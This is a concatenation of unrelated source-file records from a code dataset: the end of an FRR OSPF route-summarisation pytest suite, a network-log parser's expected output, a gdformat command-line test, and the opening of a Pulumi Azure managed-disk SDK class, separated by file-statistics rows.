"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "12.0.0.0/8", "action": "deny"},
{"seqid": 20, "network": "any", "action": "permit"},
]
}
}
}
}
result = create_prefix_lists(tgen, pfx_list)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that summary route is not denied, summary route should be"
" originated if matching prefixes are present."
)
input_dict_summary = {"r0": {"static_routes": [{"network": "12.0.0.0/8"}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
write_test_footer(tc_name)
def test_ospf_type5_summary_tc51_p2(request):
"""OSPF CLI Show.
verify ospf ASBR summary config and show commands behaviours.
"""
tc_name = request.node.name
write_test_header(tc_name)
tgen = get_topogen()
# Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
global topo
step("Bring up the base config as per the topology")
reset_config_on_routers(tgen)
step("Configure all the supported OSPF ASBR summary commands on DUT.")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": 4294967295,
},
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "16",
"advertise": True,
},
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "24",
"advertise": False,
},
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "24",
"advertise": False,
},
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure and re configure all the commands 10 times in a loop.")
for itrate in range(0, 10):
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": 4294967295,
},
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "16",
"advertise": True,
},
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "24",
"advertise": False,
},
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "24",
"advertise": False,
},
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": 4294967295,
"delete": True,
},
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "16",
"advertise": True,
"delete": True,
},
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "24",
"advertise": False,
"delete": True,
},
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "24",
"advertise": False,
"delete": True,
},
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify the show commands")
input_dict = {
SUMMARY["ipv4"][2]: {
"Summary address": SUMMARY["ipv4"][2],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 0,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
write_test_footer(tc_name)
def test_ospf_type5_summary_tc49_p2(request):
"""OSPF summarisation Chaos."""
tc_name = request.node.name
write_test_header(tc_name)
tgen = get_topogen()
# Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
global topo
step("Bring up the base config as per the topology")
reset_config_on_routers(tgen)
protocol = "ospf"
step(
"Configure 5 static routes from the same network on R0"
"5 static routes from different networks and redistribute in R0"
)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
dut = "r0"
red_static(dut)
step("Verify that routes are learnt on R1.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Configure External Route summary in R0 to summarise 5" " routes to one route."
)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary "
"address on R0 after 5 secs of delay timer expiry and only one "
"route is sent to R1."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Verify that originally advertised routes are withdraw from there" " peer.")
input_dict = {
"r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step("Reload the FRR router")
# stop/start -> restart FRR router and verify
stop_router(tgen, "r0")
start_router(tgen, "r0")
step(
"Verify that external routes are summarised to configured summary "
"address on R0 after 5 secs of delay timer expiry and only one "
"route is sent to R1."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Verify that originally advertised routes are withdraw from there" " peer.")
input_dict = {
"r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step("Kill OSPFd daemon on R0.")
kill_router_daemons(tgen, "r0", ["ospfd"])
step("Bring up OSPFd daemon on R0.")
start_router_daemons(tgen, "r0", ["ospfd"])
step("Verify OSPF neighbors are up after bringing back ospfd in R0")
# Api call verify whether OSPF is converged
ospf_covergence = verify_ospf_neighbor(tgen, topo)
assert ospf_covergence is True, "setup_module :Failed \n Error:" " {}".format(
ospf_covergence
)
step(
"Verify that external routes are summarised to configured summary "
"address on R0 after 5 secs of delay timer expiry and only one "
"route is sent to R1."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Verify that originally advertised routes are withdraw from there" " peer.")
input_dict = {
"r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step("restart zebrad")
kill_router_daemons(tgen, "r0", ["zebra"])
step("Bring up zebra daemon on R0.")
start_router_daemons(tgen, "r0", ["zebra"])
step(
"Verify that external routes are summarised to configured summary "
"address on R0 after 5 secs of delay timer expiry and only one "
"route is sent to R1."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Verify that originally advertised routes are withdraw from there" " peer.")
input_dict = {
"r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
write_test_footer(tc_name)
if __name__ == "__main__":
args = ["-s"] + sys.argv[1:]
sys.exit(pytest.main(args))
| 32.958493
| 88
| 0.551393
| 12,880
| 111,960
| 4.644721
| 0.034705
| 0.043628
| 0.058505
| 0.059575
| 0.921938
| 0.916187
| 0.909869
| 0.904704
| 0.89307
| 0.890562
| 0
| 0.023558
| 0.317542
| 111,960
| 3,396
| 89
| 32.968198
| 0.759397
| 0.036504
| 0
| 0.721868
| 0
| 0
| 0.310878
| 0.00029
| 0
| 0
| 0
| 0
| 0.089526
| 1
| 0.004246
| false
| 0
| 0.003892
| 0
| 0.008139
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56c32bffda9a2202d300b9205f7e14773f637431
| 2,086
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowLoggingOnboardRpActiveTemperatureContinuous/cli/equal/golden_output_2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowLoggingOnboardRpActiveTemperatureContinuous/cli/equal/golden_output_2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowLoggingOnboardRpActiveTemperatureContinuous/cli/equal/golden_output_2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | null | null | null |
expected_output = {
'application': 'ERROR MESSAGE',
'error_message': {
'11/11/2019 03:46:31': ['IOSXE-2-DIAGNOSTICS_PASSED : Diagnostics Thermal passed'],
'11/11/2019 03:46:41': ['IOSXE-2-DIAGNOSTICS_PASSED : Diagnostics Fantray passed'],
'11/11/2019 03:45:41': ['IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/1', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/4', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/5', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/10', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/11', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/12', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Fou1/0/15', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Fou1/0/16', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Fou1/0/17', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Fou1/0/18', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Fou1/0/19', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Fou1/0/20', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Fou1/0/21', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Fou1/0/22', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/23', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/24', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/25', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/26', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/28', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/29', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/32', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/33', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/35', 'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in Hu1/0/36']
}
}
| 260.75
| 1,812
| 0.771812
| 303
| 2,086
| 5.221122
| 0.158416
| 0.098609
| 0.257901
| 0.379267
| 0.926675
| 0.854614
| 0.854614
| 0.854614
| 0.854614
| 0.854614
| 0
| 0.086839
| 0.111218
| 2,086
| 8
| 1,813
| 260.75
| 0.766451
| 0
| 0
| 0
| 0
| 0
| 0.905127
| 0.346909
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 13
|
56f55342152b2f0baf7a3d55a9d314dc901975bf
| 829
|
py
|
Python
|
tests/formatter/test_executable.py
|
dzil123/godot-gdscript-toolkit
|
d3687f66390937a4fefd90a508a4899d56fc9f7c
|
[
"MIT"
] | null | null | null |
tests/formatter/test_executable.py
|
dzil123/godot-gdscript-toolkit
|
d3687f66390937a4fefd90a508a4899d56fc9f7c
|
[
"MIT"
] | null | null | null |
tests/formatter/test_executable.py
|
dzil123/godot-gdscript-toolkit
|
d3687f66390937a4fefd90a508a4899d56fc9f7c
|
[
"MIT"
] | null | null | null |
import subprocess
from ..common import write_file
def test_valid_file(tmp_path):
dummy_file = write_file(tmp_path, "script.gd", "tool")
assert subprocess.run(["gdformat", dummy_file], check=False).returncode == 0
def test_check_valid_file_to_reformat(tmp_path):
dummy_file = write_file(tmp_path, "script.gd", "tool;var x")
assert (
subprocess.run(["gdformat", "--check", dummy_file], check=False).returncode != 0
)
def test_invalid_file(tmp_path):
dummy_file = write_file(tmp_path, "script.gd", "too")
assert subprocess.run(["gdformat", dummy_file], check=False).returncode != 0
def test_invalid_file_check(tmp_path):
dummy_file = write_file(tmp_path, "script.gd", "too")
assert (
subprocess.run(["gdformat", "--check", dummy_file], check=False).returncode != 0
)
| 29.607143
| 88
| 0.697226
| 115
| 829
| 4.73913
| 0.243478
| 0.102752
| 0.121101
| 0.117431
| 0.842202
| 0.842202
| 0.842202
| 0.842202
| 0.842202
| 0.842202
| 0
| 0.005722
| 0.156815
| 829
| 27
| 89
| 30.703704
| 0.773963
| 0
| 0
| 0.333333
| 0
| 0
| 0.12304
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 1
| 0.222222
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56fd92e135e564a246da8a53d8fda2ab5dcfae4e
| 89,455
|
py
|
Python
|
sdk/python/pulumi_azure/compute/managed_disk.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/compute/managed_disk.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/compute/managed_disk.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ManagedDiskArgs', 'ManagedDisk']
@pulumi.input_type
class ManagedDiskArgs:
def __init__(__self__, *,
create_option: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
storage_account_type: pulumi.Input[str],
disk_access_id: Optional[pulumi.Input[str]] = None,
disk_encryption_set_id: Optional[pulumi.Input[str]] = None,
disk_iops_read_only: Optional[pulumi.Input[int]] = None,
disk_iops_read_write: Optional[pulumi.Input[int]] = None,
disk_mbps_read_only: Optional[pulumi.Input[int]] = None,
disk_mbps_read_write: Optional[pulumi.Input[int]] = None,
disk_size_gb: Optional[pulumi.Input[int]] = None,
encryption_settings: Optional[pulumi.Input['ManagedDiskEncryptionSettingsArgs']] = None,
gallery_image_reference_id: Optional[pulumi.Input[str]] = None,
hyper_v_generation: Optional[pulumi.Input[str]] = None,
image_reference_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logical_sector_size: Optional[pulumi.Input[int]] = None,
max_shares: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
network_access_policy: Optional[pulumi.Input[str]] = None,
on_demand_bursting_enabled: Optional[pulumi.Input[bool]] = None,
os_type: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
source_resource_id: Optional[pulumi.Input[str]] = None,
source_uri: Optional[pulumi.Input[str]] = None,
storage_account_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tier: Optional[pulumi.Input[str]] = None,
trusted_launch_enabled: Optional[pulumi.Input[bool]] = None,
zones: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ManagedDisk resource.
:param pulumi.Input[str] create_option: The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Managed Disk should exist.
:param pulumi.Input[str] storage_account_type: The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
:param pulumi.Input[str] disk_access_id: The ID of the disk access resource for using private endpoints on disks.
:param pulumi.Input[str] disk_encryption_set_id: The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
:param pulumi.Input[int] disk_iops_read_only: The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
:param pulumi.Input[int] disk_iops_read_write: The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
:param pulumi.Input[int] disk_mbps_read_only: The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
:param pulumi.Input[int] disk_mbps_read_write: The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
:param pulumi.Input[int] disk_size_gb: Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
:param pulumi.Input['ManagedDiskEncryptionSettingsArgs'] encryption_settings: A `encryption_settings` block as defined below.
:param pulumi.Input[str] gallery_image_reference_id: ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if image_reference_id is specified.
:param pulumi.Input[str] hyper_v_generation: The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
:param pulumi.Input[str] image_reference_id: ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if gallery_image_reference_id is specified.
:param pulumi.Input[str] location: Specified the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] logical_sector_size: Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
:param pulumi.Input[int] max_shares: The maximum number of VMs that can attach to the disk at the same time. Value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
:param pulumi.Input[str] name: Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
:param pulumi.Input[str] network_access_policy: Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
:param pulumi.Input[bool] on_demand_bursting_enabled: Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
:param pulumi.Input[str] os_type: Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
:param pulumi.Input[bool] public_network_access_enabled: Whether it is allowed to access the disk via public network. Defaults to `true`.
:param pulumi.Input[str] source_resource_id: The ID of an existing Managed Disk to copy `create_option` is `Copy` or the recovery point to restore when `create_option` is `Restore`
:param pulumi.Input[str] source_uri: URI to a valid VHD file to be used when `create_option` is `Import`.
:param pulumi.Input[str] storage_account_id: The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] tier: The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
:param pulumi.Input[bool] trusted_launch_enabled: Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
:param pulumi.Input[str] zones: A collection containing the availability zone to allocate the Managed Disk in.
"""
pulumi.set(__self__, "create_option", create_option)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "storage_account_type", storage_account_type)
if disk_access_id is not None:
pulumi.set(__self__, "disk_access_id", disk_access_id)
if disk_encryption_set_id is not None:
pulumi.set(__self__, "disk_encryption_set_id", disk_encryption_set_id)
if disk_iops_read_only is not None:
pulumi.set(__self__, "disk_iops_read_only", disk_iops_read_only)
if disk_iops_read_write is not None:
pulumi.set(__self__, "disk_iops_read_write", disk_iops_read_write)
if disk_mbps_read_only is not None:
pulumi.set(__self__, "disk_mbps_read_only", disk_mbps_read_only)
if disk_mbps_read_write is not None:
pulumi.set(__self__, "disk_mbps_read_write", disk_mbps_read_write)
if disk_size_gb is not None:
pulumi.set(__self__, "disk_size_gb", disk_size_gb)
if encryption_settings is not None:
pulumi.set(__self__, "encryption_settings", encryption_settings)
if gallery_image_reference_id is not None:
pulumi.set(__self__, "gallery_image_reference_id", gallery_image_reference_id)
if hyper_v_generation is not None:
pulumi.set(__self__, "hyper_v_generation", hyper_v_generation)
if image_reference_id is not None:
pulumi.set(__self__, "image_reference_id", image_reference_id)
if location is not None:
pulumi.set(__self__, "location", location)
if logical_sector_size is not None:
pulumi.set(__self__, "logical_sector_size", logical_sector_size)
if max_shares is not None:
pulumi.set(__self__, "max_shares", max_shares)
if name is not None:
pulumi.set(__self__, "name", name)
if network_access_policy is not None:
pulumi.set(__self__, "network_access_policy", network_access_policy)
if on_demand_bursting_enabled is not None:
pulumi.set(__self__, "on_demand_bursting_enabled", on_demand_bursting_enabled)
if os_type is not None:
pulumi.set(__self__, "os_type", os_type)
if public_network_access_enabled is not None:
pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
if source_resource_id is not None:
pulumi.set(__self__, "source_resource_id", source_resource_id)
if source_uri is not None:
pulumi.set(__self__, "source_uri", source_uri)
if storage_account_id is not None:
pulumi.set(__self__, "storage_account_id", storage_account_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tier is not None:
pulumi.set(__self__, "tier", tier)
if trusted_launch_enabled is not None:
pulumi.set(__self__, "trusted_launch_enabled", trusted_launch_enabled)
if zones is not None:
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="createOption")
def create_option(self) -> pulumi.Input[str]:
"""
The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
"""
return pulumi.get(self, "create_option")
@create_option.setter
def create_option(self, value: pulumi.Input[str]):
pulumi.set(self, "create_option", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the Managed Disk should exist.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="storageAccountType")
def storage_account_type(self) -> pulumi.Input[str]:
"""
The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
"""
return pulumi.get(self, "storage_account_type")
@storage_account_type.setter
def storage_account_type(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_account_type", value)
@property
@pulumi.getter(name="diskAccessId")
def disk_access_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the disk access resource for using private endpoints on disks.
"""
return pulumi.get(self, "disk_access_id")
@disk_access_id.setter
def disk_access_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_access_id", value)
@property
@pulumi.getter(name="diskEncryptionSetId")
def disk_encryption_set_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
"""
return pulumi.get(self, "disk_encryption_set_id")
@disk_encryption_set_id.setter
def disk_encryption_set_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_encryption_set_id", value)
@property
@pulumi.getter(name="diskIopsReadOnly")
def disk_iops_read_only(self) -> Optional[pulumi.Input[int]]:
"""
The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
"""
return pulumi.get(self, "disk_iops_read_only")
@disk_iops_read_only.setter
